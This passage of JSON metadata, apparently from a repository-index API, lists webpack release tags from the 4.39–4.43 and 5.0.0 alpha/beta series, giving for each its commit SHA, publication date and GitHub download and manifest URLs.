ck/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146